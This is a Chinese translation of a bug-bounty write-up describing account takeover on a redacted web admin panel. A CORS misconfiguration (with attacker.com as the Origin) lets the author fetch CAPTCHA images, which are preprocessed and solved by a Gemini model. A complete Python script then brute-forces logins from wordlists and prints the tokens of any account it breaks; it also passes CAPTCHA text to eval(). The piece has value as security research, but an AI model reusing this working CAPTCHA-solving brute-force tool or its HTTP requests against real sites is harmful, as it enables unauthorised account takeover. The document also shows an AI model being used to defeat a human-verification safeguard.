利用AI模型绕过CAPTCHA

文化   2024-11-20 12:03   韩国  

扫码领资料

获网安教程


Track安全社区投稿~  

赢千元稿费!还有保底奖励~(https://bbs.zkaq.cn)

通过AI绕过CAPTCHA揭示了潜在的漏洞,暴露了Web安全中的关键缺陷。

大家好, 我是 ph-hitachi,一名全栈开发工程师、DevOps工程师兼安全研究员,同时拥有自动化工程与漏洞赏金自动化的经验。今年,我致力于探索新的攻击向量,重点研究如何利用现代工具与技术,以及黑客可能如何利用这些技术进行攻击与利用。

引言:

随着自动化的兴起,AI驱动的技术取得了显著进步,这些技术在网络安全中的应用也日益广泛。最近,我遇到了一种使用AI技术进行攻击而非保护系统的情况。这篇文章将详细说明如何使用AI模型,特别是生成式AI,绕过CAPTCHA防护,并接管一个Web应用程序中的账户。

什么是CAPTCHA?

CAPTCHA,全称为完全自动化公共图灵测试用于区分计算机和人类(Completely Automated Public Turing test to tell Computers and Humans Apart),是一种广泛使用的安全机制,旨在保护在线服务免受诸如暴力破解凭据填充机器人活动等自动化滥用行为的侵害。
通常,CAPTCHA挑战会提供一项对人类容易但对机器人困难的任务,例如识别图片中的物体、辨认扭曲的文字或解决基础数学问题。

CAPTCHA的主要功能是阻止自动化脚本或机器人执行有害操作,例如反复尝试用户名和密码组合,直到找到有效匹配。然而,CAPTCHA的防御仅在无法被绕过或自动解决时才有效。


测试概览

我们使用了手动与自动化工具相结合的方法对平台进行了测试。测试过程包括以下步骤:

1.从服务器提取CAPTCHA图像。
2.使用AI模型自动解决CAPTCHA图像。
3.通过“集群炸弹”方法测试登录页面的抗暴力破解能力。

漏洞发现概述:

img
第一步:识别CAPTCHA端点的CORS配置错误
发现此漏洞的第一步是测试 {BASE_URL}/admin-web/captcha/show 端点的安全性。在测试中,我发现该端点存在CORS(跨域资源共享)配置错误,允许未经授权的来源访问敏感资源,例如CAPTCHA图像。
img
通过从一个不受信任的域发送简单的HTTP请求,我能够在没有任何服务器端来源验证的情况下获取CAPTCHA图像。
POST /admin-web/captcha/show HTTP/2Host: [redacted].comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brReferer: [redacted].comContent-Type: application/x-www-form-urlencodedContent-Length: 10Origin: http://attacker.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailers
sysId=1000
HTTP/2 200 OKContent-Type: application/jsonDate: Tue, 01 Oct 2024 01:28:11 GMTX-Trace-Id: i100,i101001a441232779d64e6f88ea3b2040cfb43aVary: OriginVary: Access-Control-Request-MethodVary: Access-Control-Request-HeadersAccess-Control-Allow-Origin: http://attacker.comAccess-Control-Expose-Headers: Set-CookieAccess-Control-Allow-Credentials: trueX-Cache: Miss from cloudfront
{"img":"/9j/4AAQSkZJRgABAgAAAQABAAD(truncated)...","key":"code_xxxxxxxxxxx"}
这一被暴露的CAPTCHA图像成为攻击的切入点,因为它可以被自动获取并进行处理。
img
第二步:测试认证流程
在确认CAPTCHA暴露后,下一步是分析认证流程。我针对 {BASE_URL}/admin-web/auth/authInfo 端点进行测试,该端点负责验证用户凭据。每次登录请求都需要提供用户名、密码,以及最新的CAPTCHA解答。
img
一旦发送请求,服务器会返回响应,指示登录是否成功。
loginName: 在暴力破解攻击中测试的用户名。
loginPassword: 测试的密码。
captchaCode: CAPTCHA解答(例如:CAPTCHA文本为6+3,解答为captchaCode)。
captchaKey: 从初始CAPTCHA请求中获取的密钥。
img
第三步:使用AI模型解决CAPTCHA
最初,当尝试使用AI模型解决CAPTCHA时,我注意到默认的CAPTCHA图像由于图像质量较差而导致解答错误。CAPTCHA呈现的是简单的数学公式,如6 + 4,但AI将其错误地解释为一串数字(例如"6743"),而不是正确地解决该公式。
img
为了解决这个问题,我应用了图像预处理技术来提高CAPTCHA的清晰度,从而使AI能够以100%的准确率读取CAPTCHA。关键是将图像转换为黑白格式并进行锐化处理。我参考了以下命令来实现这一效果 https://mathieularose.com/decoding-captchas:
img
$ convert captcha_image.png -gaussian-blur 0 -threshold 25% -paint 1 captcha_image-1.png
img
通过应用高斯模糊阈值处理涂鸦操作,图像的边缘得到了锐化,噪声得到了减少,使得验证码对AI模型更加易读。
在对图像进行预处理后,AI模型始终能准确地生成结果,正确地解决数学方程式,如 6 + 4。这一步在自动化验证码解答过程中的高准确度至关重要。
步骤 4:使用Python脚本解答验证码
在从易受攻击的端点获取验证码图像并通过AI模型解答后,下一步是通过脚本化该过程实现自动化。
img
img
步骤 5:暴力破解攻击实现:使用字典列表,对登录端点执行暴力破解攻击,利用提取的验证码代码和密钥。

脚本实现概述

步骤 1:发送第一次HTTP请求以获取验证码:
向 /admin-web/captcha/show 发送 POST 请求,以获取验证码图像(作为Base64编码的字符串)及其对应的密钥。
步骤 2:解码图像并进行处理:
使用响应中的Base64图像数据,按照上述方式使用Pillow图像处理库进行处理,并使用AI模型从验证码图像中提取文本。
步骤 3:解答验证码:
解析AI模型输出的文本。如果文本表示数学问题(例如6 + 4 = ?),则解算该方程得到验证码答案。
步骤 4:使用字典攻击进行暴力破解:
发送POST请求到 /admin-web/auth/authInfo,使用不同的用户名和密码组合,其中包括验证码答案(captchaCode)和验证码密钥(captchaKey,来自步骤1)。
img
demo脚本:
#/bin/python
import requestsimport base64from PIL import Image, ImageFilterfrom io import BytesIOimport osimport reimport argparseimport time # Import time for delayfrom colorama import init, Fore, Stylefrom tqdm import tqdm # Import tqdm for the real-time progress barfrom google.api_core.exceptions import ResourceExhausted # Import the exception
# Initialize coloramainit(autoreset=True)
# Configure API key for Google Generative AIimport google.generativeai as genaigenai.configure(api_key=os.environ['GEMINI_API_KEY'])
# Define constantsBASE_URL = "https://[REDACTED].com"CAPTCHA_URL = f"{BASE_URL}/admin-web/captcha/show"AUTH_URL = f"{BASE_URL}/admin-web/auth/authInfo"SYS_ID = "1000" # System ID
RETRY_LIMIT = 5 # Set a retry limit for handling quota exhaustion
# Step 1: Send First HTTP Request to Get the Captchadef get_captcha(): payload = {'sysId': SYS_ID} response = requests.post(CAPTCHA_URL, headers={ 'Content-Type': 'application/x-www-form-urlencoded' }, data=payload)
if response.status_code == 200: return response.json() else: raise Exception("Failed to retrieve CAPTCHA")
# Step 2: Decode the Image and Apply Gaussian blur, thresholding, and paintingdef process_captcha(captcha_data): # Decode the base64 image image_data = base64.b64decode(captcha_data["img"]) image_pil = Image.open(BytesIO(image_data))
# Image Processing image_blurred = image_pil.filter(ImageFilter.GaussianBlur(0)) # No blur image_gray = image_blurred.convert("L") threshold_value = 64 image_threshold = image_gray.point(lambda p: p > threshold_value and 255)
# Optional: Enhance and smooth the image image_painted = image_threshold.filter(ImageFilter.EDGE_ENHANCE).filter(ImageFilter.SMOOTH)
return image_painted
# Step 3: Solve the Captchadef solve_captcha(image, retry_count=0): # Generate the content using the AI model prompt = "Extract the text from this image." model = genai.GenerativeModel(model_name="gemini-1.5-flash")
try: response = model.generate_content([prompt, image])
# Check if the response has candidates and extract the text if response.candidates and response.candidates[0].content.parts: generated_text = response.candidates[0].content.parts[0].text.strip() # Extract the text return generated_text else: print(f"\n{Fore.RED}Error: CAPTCHA solving was not successful for reason: {response.candidates.finish_reason}") return None except ResourceExhausted as e: # Handle resource exhaustion by retrying with a delay if retry_count < RETRY_LIMIT: print(f"\n{Fore.RED}Quota exceeded. Retrying in 30 seconds... (Attempt {retry_count + 1}/{RETRY_LIMIT})") time.sleep(30) # Wait for 60 seconds before retrying return solve_captcha(image, retry_count + 1) else: print(f"\n{Fore.RED}Quota exhausted and retry limit reached. Exiting.") exit(1) except AttributeError as e: # Handle attribute error in case of incorrect response fields print(f"\n{Fore.RED}AttributeError: Possibly incorrect field in the response. Check for proper API handling.") print(f"\nError details: {e}") return None
# Evaluate a math expressiondef evaluate_math_expression(expression): try: result = eval(expression) return str(result) except Exception as e: print(f"\nError evaluating expression: {e}") return None
# Step 4: Use a Cluster Bomb Attack with Wordlistdef brute_force_login(username, password, attempt_count, total_attempts, progress_bar): # Get a new CAPTCHA for every login attempt captcha_data = get_captcha() captcha_image = process_captcha(captcha_data) captcha_text = solve_captcha(captcha_image)
# Check if the CAPTCHA was successfully solved if captcha_text is None: print(f"\n{Fore.RED}Failed to solve CAPTCHA. Skipping this attempt.") return # Skip this login attempt
# Find the math expression in the text math_expression = re.search(r'(\d+\s*[\+\-\*\/]\s*\d+)', captcha_text)
if math_expression: captcha_code = evaluate_math_expression(math_expression.group(0)) captcha_key = captcha_data["key"]
# Construct the payload for login attempt payload = { 'loginName': username, 'loginPassword': password, 'sysId': SYS_ID, 'captchaCode': captcha_code, 'captchaKey': captcha_key, 'loginVersion': 'v5', 'noTgAuth': 'v1' }
# Make the login attempt request response = requests.post(AUTH_URL, headers={ 'Content-Type': 'application/x-www-form-urlencoded' }, data=payload)
response_json = response.json()
# Only print success messages (when the response content is greater than 2000 bytes) if len(response.content) > 2000: # Check if response size is greater than 2000 bytes tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.GREEN + f"TraceID: {Fore.YELLOW}{response_json.get('traceId', 'N/A')}") tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.GREEN + "Credentials match:") tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.YELLOW + f"Username: {Fore.GREEN}{username}") tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.YELLOW + f"Password: {Fore.GREEN}{password}") tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.YELLOW + f"Captcha Content: {Fore.GREEN}{math_expression.group(0)}") tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.YELLOW + f"Captcha Code: {Fore.GREEN}{captcha_code}") tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.YELLOW + f"Captcha Key: {Fore.GREEN}{captcha_key}") tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.GREEN + "User Information:") tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.YELLOW + f"Merchant ID: {Fore.GREEN}{response_json['data'].get('merId', 'N/A')}") tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.YELLOW + f"User Name: {Fore.GREEN}{response_json['data'].get('loginName', 'N/A')}") tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.YELLOW + f"User ID: {Fore.GREEN}{response_json['data'].get('userId', 'N/A')}") tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.YELLOW + f"Role ID: {Fore.GREEN}{response_json['data'].get('roleId', 'N/A')}") tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.YELLOW + f"X-Token: {Fore.GREEN}{response_json['data'].get('token', 'N/A')}")
return response_json
# Update progress bar for failed attempts (without printing the failure message) progress_bar.update(1)
# Introduce delay between each brute force attempt to avoid overloading the API # time.sleep(REQUEST_DELAY)
# Load usernames or passwords from a filedef load_wordlist(file_path): with open(file_path, 'r') as file: return [line.strip() for line in file.readlines()]
# Main executionif __name__ == "__main__": parser = argparse.ArgumentParser(description='Brute force login script with CAPTCHA solving.') parser.add_argument('--username', required=True, help='Path to the file containing usernames (one per line) or a single username string.') parser.add_argument('--password', required=True, help='Path to the file containing passwords (one per line) or a single password string.')
args = parser.parse_args()
# Load username and password wordlists or single strings username_list = load_wordlist(args.username) if os.path.isfile(args.username) else [args.username] password_list = load_wordlist(args.password) if os.path.isfile(args.password) else [args.password]
total_attempts = len(username_list) * len(password_list) attempt_count = 0
# Initialize progress bar with tqdm(total=total_attempts, desc="Brute Force Attack", ncols=100, ascii=True, colour="yellow") as progress_bar: # Perform brute-force login attempts for username in username_list: for password in password_list: brute_force_login(username, password, attempt_count, total_attempts, progress_bar) attempt_count += 1
以上内容由白帽子左一翻译并整。原文:https://infosecwriteups.com/utilizing-ai-model-for-hacking-bypassing-captchas-using-ai-leads-to-account-takeover-bug-bounty-028804b779a0

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权

如果你是一个网络安全爱好者,欢迎加入我的知识星球:zk安全知识星球,我们一起进步一起学习。星球不定期会分享一些前沿漏洞,每周安全面试经验、SRC实战纪实等文章分享,微信识别二维码,即可加入。


白帽子左一
零基础也能学渗透!关注我,跟我一启开启渗透测试工程师成长计划.专注分享网络安全知识技能.
 最新文章